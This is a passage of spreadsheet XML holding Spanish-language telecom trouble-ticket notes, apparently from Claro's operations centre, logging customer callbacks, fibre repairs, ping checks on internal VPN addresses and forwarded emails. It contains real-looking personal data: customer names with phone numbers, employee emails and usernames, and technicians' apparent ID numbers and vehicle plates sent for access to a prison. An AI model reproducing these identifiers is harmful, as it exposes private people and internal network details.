PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-757752##] : SOLICITUD DE ACCESOS. F4586220 || "CC_TYT_GT_ATM888" ||
BUEN DÍA
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO LE COMENTO QUE TENEMOS A PERSONAL TÉCNICO EN SITIO, PERO COMENTA QUE NO HAY PERSONAL DE TAVSA PRESENTE, TÉCNICO ESPERARA HASTA LAS 11:00  DE LA MAÑANA SINO SE PROCEDE A COORDINAR VISITA PARA EL DÍA LUNES A LAS 10.00 AM,
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS</t>
  </si>
  <si>
    <t>F4586221</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE BYRON PERO ENVIA A BUZON.
3001671790
COLA:
NOMBRE: A: 47690130
NÚMERO: 47690130
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47690130
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 14:38:09</t>
  </si>
  <si>
    <t>F4586230</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ULICES AL 70736057  INDICA QUE ESTA FUERA EN ESTE MOMENTO SOLICITA QUE SE LE LLAME A LAS 18:00 HRS **
ID 30016706794
**</t>
  </si>
  <si>
    <t>SE HABLA CON SUPERVISOR UMBERTO CHIQUILLO COMENTA QUE TECNICOS ESTAN A 4 HORAS DEL LUGAR, POR LO QUE SE LLAMARA A CLIENTE PARA, NOS ATIENDE  ULISES 70736057 , POR LO CUAL COMENTA QUE SE PUEDA REALIZR LA VISITA EL DIA DE MAÑANA A LAS 8:00 AM</t>
  </si>
  <si>
    <t>F4586231</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE FRANCISCO, SE VALIDAN  ENERGIA EN SITIO, CLIENTE NO LOGRA UBICAR MARCA DEL EQUIPO QUE RECIBE LA FIBRA OPTICO, SE COORDINARA VISITA PARA REVISAR EQUIPOS Y CONEXIONES Y QUE SE ENCUNTRA SIN LINK DE FIBRA DESDE EL SW DE ACCESO.
NÚMERO: 0022550114
FIN: HOY, 16:24
ID DE LLAMADA: 3001700984</t>
  </si>
  <si>
    <t xml:space="preserve"> SE VALIDA QUE YA SE ENCUENTRA OPERATIVO EL SE VALIDARA 88216979 MANUEL DELGADILLO
&lt;AMANNITIN1T1B02A01EID1&gt;PING -VPN MPLS_POLICIA 10.15.252.212
  PING 10.15.252.212: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.15.252.212: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.15.252.212: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.15.252.212: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.15.252.212: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.15.252.212: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.15.252.212 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;AMANNITIN1T1B02A01EID1&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A MANUEL DELGADILLO QUIEN ATIENEDE LA FALLA FISICA INDICA QUE SE REALIZO REPARACION DE FIBRA OPTICA OCACIONADA POR ROEDORES (ARDILLAS ) LAS CUALES PROVOCARON UNA RUPTURA DE FO A 650 MTS DEL CLIENTE SE PROCEDE CON CIERRE</t>
  </si>
  <si>
    <t>F4586234</t>
  </si>
  <si>
    <t>SE LLAMA A MANUEL DELGADILLO QUIEN ATIENEDE LA FALLA FISICA INDICA QUE SE REALIZO REPARACION DE FIBRA OPTICA OCACIONADA POR ROEDORES (ARDILLAS ) LAS CUALES PROVOCARON UNA RUPTURA DE FO A 650 MTS DEL CLIENTE</t>
  </si>
  <si>
    <t>F4586237</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN CHUN 42603158 MENCIONA QUE NO PODIA SACAR NI RECIBIR LLAMADAS DEL EXTRENJERO
CLIENTE CONFIRMA QUE YA PUEDE SACAR Y RECIBIR LLAMADAS SIN NINGUN PROBLEMA
-ID 3001673145</t>
  </si>
  <si>
    <t>F4586239</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE ## INDICA QUE YA TODO OK ## VALIDA CIERRE KATERIN VENTURA-35462049 / 22011401 ##VIVO</t>
  </si>
  <si>
    <t>F4586245</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO WILDER Y CLIENTE LOURDES,  COMENTA CLIENTE QUE SE PUEDA REALIZR LA VISITA EL DIA DE MAÑANA A LAS 8:00 AM.
3001898632
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/06/2022 13:31:01</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SRTA. LOURDES AL 56989972 CONFIRMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, APLICA REINICIO, ENLACE NO REESTABLECE ...</t>
  </si>
  <si>
    <t>F4586246</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE EN HORARIO HABIL, SI AUN NO HA RETORNADO ENERGÍA ELECTRICA
LIVINGSTON (OFICINA)
DIRECCIÓN: CABECERA DE LIVINGSTON, A UN COSTADO DE LA ESCUELA DE NIÑAS.
TEL: 4297-1878
HORARIO DE ATENCIÓN: 8:00 ¿ 17:00 DE LUNES A VIERNES
SE LLAMO A CLIENTE PERO NO SE OBTUVO RESPUESTA
3001745816
COLA:
NOMBRE: A: 42971878
NÚMERO: 42971878
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42971878
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 1/06/2022 18:16:54</t>
  </si>
  <si>
    <t>SE LLAMO A LA AGENCIA DE FUNDACION GENESIS DE LIVINGSTON CONTESTA ASESORA NO INDICA SU NOMBRE, COMENTA QUE SE HAY UN PROBLEMA DE ENERGIA ELECTRICA EN EL SECTOR ES FALLA DE LA EMPRESA ELECTRICA, COMENTA QUE EL COMBUSTIBLE QUE TIENE SU MOTOGENERADOR DE ENERGIA SOLO DURA UNAS HORAS POR LO QUE CUANDO SE ACABA EL COMBUSTIBLE SE QUEDAN SIN ENERGIA, COMENTA QUE NO LE HAN DADO FECHA PARA LAS REPARACIONES, POR PARTE DE CLARO NO SE TIENEN AFECTACIONES SE PROCEDERA AL CIERRE DEL TICKET.
3001919783
COLA:
NOMBRE: A: 42971878
NÚMERO: 42971878
DURACIÓN: 0:04:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42971878
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 14:45:12</t>
  </si>
  <si>
    <t>F4586249</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEJANDRO BARAHONA 88553016 ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUISA HERNANDEZ 85407562 MENCIONA QUE YA APLICARON REINICIO PERO PERSISTE EL INCONVENIENTE
-ID 3001809399
UBICACIÓN:KILOMETRO 135 CARRETERA A SOMOTILLO, CHINANDEGA
CONTACTO EN SITIO:  LUISA HERNANDEZ 85407562
HORARIO DE ATENCION: HASTA LAS 16
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUISA HERNANDEZ 85407562 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:30
-ID 3001739670</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL LUISA HERNANDEZ 85407562 CONTESTA PERO SE ESCUCHA MUCHO RUIDO Y CORTA LLAMADA || SE INTENTARA LUEGO **
ID 3001708454
**</t>
  </si>
  <si>
    <t>SR. ALEJANDRO BARAHONA 88553016 VALIDA ENLACE, SE PROCEDE AL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>F4586254</t>
  </si>
  <si>
    <t>ENLACE SE VE ESTABLE
&lt;HCHNNID0N1T1A03A01EID1&gt;PING -C 1500  -M 30 -B  -VPN-INSTANCE MPLS_MINED_DEL 10.15.72.43
  PING 10.15.72.43: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.15.72.43 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1499 PACKET(S) RECEIVED
    0.06% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/20 MS
&lt;HCHNNID0N1T1A03A01EID1&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEYZEL HERNANDEZ 58807233 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001702387</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HEYZEL HERNANDEZ AL 58807233 CLIENTE CONFIRMA SERVICIO ESTABLE
 Y OPERATIVO **
ID 3001791512
**</t>
  </si>
  <si>
    <t>F4586261</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON GERSON GUTIÉRREZ/CLIENTE 22024080 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4586281</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE RODRIGO MENCIONA QUE YA TIENEN EL TICKET INTERNO CERRADO
-ID 3001740840</t>
  </si>
  <si>
    <t>F4586284</t>
  </si>
  <si>
    <t>F4586288</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENEYDA DELGADO AL 63006794 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001693579
**</t>
  </si>
  <si>
    <t>F4586296</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE ESTARA VALIDANDO
-ID 3001742746</t>
  </si>
  <si>
    <t>CLIENTE  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001742746</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO CORTAN LLAMADA || SE INTENTARA LUEGO **
ID 3001715145
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 18:03
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002488984OC ::: IMBBL004085 ::: LINK DOWN
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4586307</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MONICA QUIEN VA APOYAR A REINCIAR LOS EQUIPOS.
3001698071
COLA:
NOMBRE: A: 46357354
NÚMERO: 46357354
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 46357354
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 15:57:25</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA AL CLIENTE MONICA A QUIEN SE LE SOLICITA QUE SOLICITA QUE SE REINCIE LA PBX LA CUAL ES UNA ALCATEL.
CLIENTE COLOCA AL PROVEEDOR DE LA PBX QUIEN SOLICITA SE REINICE TODOS LOS EQUIPOS.
3001712031
COLA:
NOMBRE: A: 46357354
NÚMERO: 46357354
DURACIÓN: 0:01:36
ESTADO: CONECTADA
DETALLES: 46357354
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 16:49:59</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE VICTOR QUIEN NO UBICO LOS EQUIPOS Y SOLICITA QUE SE LE LLAME EN 20MIN.
3001684371
COLA:
NOMBRE: A: 57121280
NÚMERO: 57121280
DURACIÓN: 0:01:55
ESTADO: CONECTADA
DETALLES: 57121280
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 15:18:15</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MONICA  HERRERA, QUIEN INDICA QUE NO ESTA EN LAS INSTALACIONES Y SOLICITA QUE SE LLAME A VICTOR 57121280
3001684020
COLA:
NOMBRE: A: 46357354
NÚMERO: 46357354
DURACIÓN: 0:00:44
ESTADO: CONECTADA
DETALLES: 46357354
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 15:15:25</t>
  </si>
  <si>
    <t>F4586318</t>
  </si>
  <si>
    <t>CLIENTE  SR. LUIS FERNANDO REALIZO PRUEBAS, VALIDA EQUIPOS ENCENDIDOS, APLICARON REINICIO PERO ENLACE NO LEVANTA, SOLICITA LA VISITA PARA HOY A LAS 11 AM YA QUE LLEGARON SUS TECNICOS PARA REALIZAR EL CAMBIO DE UN SW INTERNO APROVECHANDO LA VISITA DE CLARO PARA REALIZAR PRUEBA EN CONJUNTO Y QUEDE TODO EN ORDEN.</t>
  </si>
  <si>
    <t>*** SE ENVIAN DATOS DE PERSONAL TÉCNICO PARA LA GESTIÓN DEL ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 10:00
PARA: LJUAREZ1@HOTMAIL.COM &lt;LJUAREZ1@HOTMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: DIRECCION GENERAL DEL SISTEMA PENITENCIARIO. -- 927700005T -- GRANJA PENAL PAVON
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA SE REQUIEREN ACCESOS PARA LAS INSTALACIONES. SIENDO ASÍ SE SOLICITA DE SU APOYO CON LA GESTIÓN Y AUTORIZACIÓN PARA EL PERSONAL DESCRITO A CONTINUACIÓN.
IVAN ARRAZOLA                                   2319 45019 0101   P-959DSN
EDY ESCALANTE                                    1981 17108 0101   P-048GLD
JOSE ANGEL SANDOVAL                        1796 76350 0101   P-351HMP
RENE CAMEROS COJON                          2275 16001 0101 P-899HNK
HECTOR ROLANDO ALINAN PORON     2360 72870 0208   P-280HNJ
BYRON CUTZAL                                          1689 67987 0101   P-994FKH
WILSON WILFREDO ECHEVERRIA            2592 44201 0101 P-148GTV
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAREZ 30296744 MENCIONA QUE YA RECIBIO EL LISTADO DE PERSONAL TECNICO, CLIENTE INDICA QUE SE PROCEDA CON LA VISITA TECNICA
-ID 3001821143</t>
  </si>
  <si>
    <t>F4586324</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA ZAPATA AL 88649289 SE LLAMA A CLIENTE PERO ESTA EN UNA REUNION Y SOLICITA QUE SE LLAME EN 30 MIN NUEVAMENTE **
ID 3001844582
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA ZAPATA  AL 0050588649289 NO RESPONDE || ENVIA A BUZON SE
 INTENTARA LUEGO **
ID 1001127882
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIORGINA TREMIÑO 23418700 MAYELA  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001131706</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA  88749289  IVR INDICA QUE EL NUMERO NO SE ENCUENTRA DISPONIBLE
-ID 3001969287</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIORGINA TREMIÑO 23418700 MENCIONA QUE NO PUEDE APOYAR CON LAS PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 14:00 HRS
-ID 3001969549</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIORGINA TREMIÑO 23418700 RESPONDE GEMA QUIEN SOLICITA UN TIEMPO EN LINEA PERO SOLO SE ESCUCHAN VOCES Y NADIE ATIENDE
-ID 3001948930</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENIA SANCHEZ 75308384 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001770728
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA  88749289 ENVIA DIRECTAMENTE A BUZON
-ID 3001785025</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA ZAPATA AL 88749289 - NO RESPONDE Y SE LLAMA AL 23418700 CONTESTA LA SEÑORIT YORYINA  TREMIÑO  INDICA QUE EL NUMERO DE LA SEÑORITA CLAUDIA ES 88649289 Y TAMBIEN INDICA QUE SIGUEN CON EL INCONVENIENTE DE AMBOS SERVICIOS SOLICITA SEGUIMIENTO || SE NOTIFICA A GESTOR **
ID 3001840988 - 3001841083
**
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENIA SANCHEZ 75308384 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001784067</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLIENTE GIORGINA TREMIÑO 23418700 ATIENDE KENYA INDICA QUE ELLA NO ESTA EN EL SITIO, BRINDA DATOS DE CLAUDIA ZAPATA 88649289 A QUIEN AL LLAMARLA VALIDA SERVICIO PERO NO ESTA CONFORME Y NO COMPRENDE DE POR QUÉ LAS PRUEBAS SE REALIZAN CON RED LAN DESCONECTADA,
1001176280
COLA:
NOMBRE: A: 50523418700
NÚMERO: 23418700
DURACIÓN: 0:02:16
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 23418700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 3/06/2022 17:15:09</t>
  </si>
  <si>
    <t>**LE LLAMA  A CLIENTE YORYINA  TREMIÑO AL 23418700 COMUNICA A LAS SEÑORITA VALERIA QUIEN INDICA QUE SE LLAME EN 1 HR PARA CONFIRMAR CON LA SEÑORITA CLAUDIA **
ID 3001812232
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA  88749289  MENCIONA QUE NO PUEDE APOYAR EN ESTE MOMENTO PORQUE ESTAN EN HORA PICO POR SER RESTAURANTE, CLIENTE SOLICITA LLAMADA PARA LAS 14:00 HRS
-ID 3001862549</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIORGINA TREMIÑO 23418700 RESPONDE GEMA SOLICITA LLAMADA EN 1 HORA
-ID 3001922859</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA  88749289 IVR INDICA QUE EL NUMERO NO SE ENCUENTRA DISPONIBLE
-ID 3001922021 - 3001922143</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENIA SANCHEZ 75308384 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001775739
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA  88749289 ENVIA DIRECTAMENTE A BUZON || SE INTENTARA LUEGO**
-ID 3001810927
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENIA SANCHEZ 75308384 INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME A YORYINA  TREMIÑO AL 23418700 **
ID 3001811196
**</t>
  </si>
  <si>
    <t>F4586325</t>
  </si>
  <si>
    <t>SE TRATA DE LLAMAR A CLEINTE KENIA SANCHEZ PERO NO SE TIENE RESPUESTA,
1001186934
COLA:
NOMBRE: A: 50575308384
NÚMERO: 50575308384
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50575308384
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 3/06/2022 18:16:30</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA ZAPATA AL 88749289 - NO RESPONDE Y SE LLAMA AL 23418700 CONTESTA LA SEÑORIT YORYINA  TREMIÑO  INDICA QUE EL NUMERO DE LA SEÑORITA CLAUDIA ES 88649289 Y TAMBIEN INDICA QUE SIGUEN CON EL INCONVENIENTE DE AMBOS SERVICIOS SOLICITA SEGUIMIENTO || SE NOTIFICA A GESTOR **
ID 3001840988 - 3001841083
**</t>
  </si>
  <si>
    <t>F4586326</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 15:37PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_790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6326
ID: 8902196T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_7901
UBICADO EN:  RENAP MOMOSTENANGO 2 CALLE 1-093 ZONA 2 MOMOSTENANGO TOTONICAPAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4586340</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME REPRESA AL 75604857  NO RESPONDE || SE INTENTARA LUEGO**
ID 3001771138
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JAIME REPRESA AL 75604857 NO RESPONDE, SE INTENTARA LUEGO **
-ID 1001147490
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JAIME REPRESA 75604857 - 61982997 MENCIONA QUE YA NO VOLVIERON A PRESENTAR NINGUN PROBLEMA
-ID 10011558931 - 1001159182</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME REPRESA AL 75604857 INDCIA QUE ES LA PERSONA ENCARGADA DEL AREA TECNICA PERO QUE HOY NO SE ENCUENTRA EN SITIO Y QUE NO TODOS LOS DIAS VIAJA PARA AHI, SOLICITA QUE SE LE LLAME EL DIA VIERNES A LAS 14:00 HRS **
ID 3001776046
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JAIME REPRESA 75604857 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001130763</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE A LA HORA SOLICITADA-</t>
  </si>
  <si>
    <t>F4586344</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DR GONZALES 83552439  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001785820</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR GONZALES AL 83552439 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001777068
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR GONZALES AL 83552439 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001771506
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DR GONZALES 83552439 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001791663</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDDY VARGAS  86487154 QUIEN SOLICITA INTENTE LLAMAR  EN 10 MIN A PR
-ID 3001786264</t>
  </si>
  <si>
    <t>F4586350</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A FRANCISCO CASTILLO/CLIENTE; SE LE INFORMA ENLACE OK, SE LE PIDE CIERRE, INDICA QUE ESTÁ EN CIERRE DE PLANILLA, PIDE SE MANTENGA SERVICIO EN MONITOREO PARA MAÑANA A LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO CASTILLO 30442041  INDICA QUE TUVO UNA PEQUEÑA CAIDA A LAS 15:00 HRS  SOLICITA QUE SE DEJE EN MONITOREO PARA MAÑANA A LAS 13:00 HRS **
ID 3001963658
**</t>
  </si>
  <si>
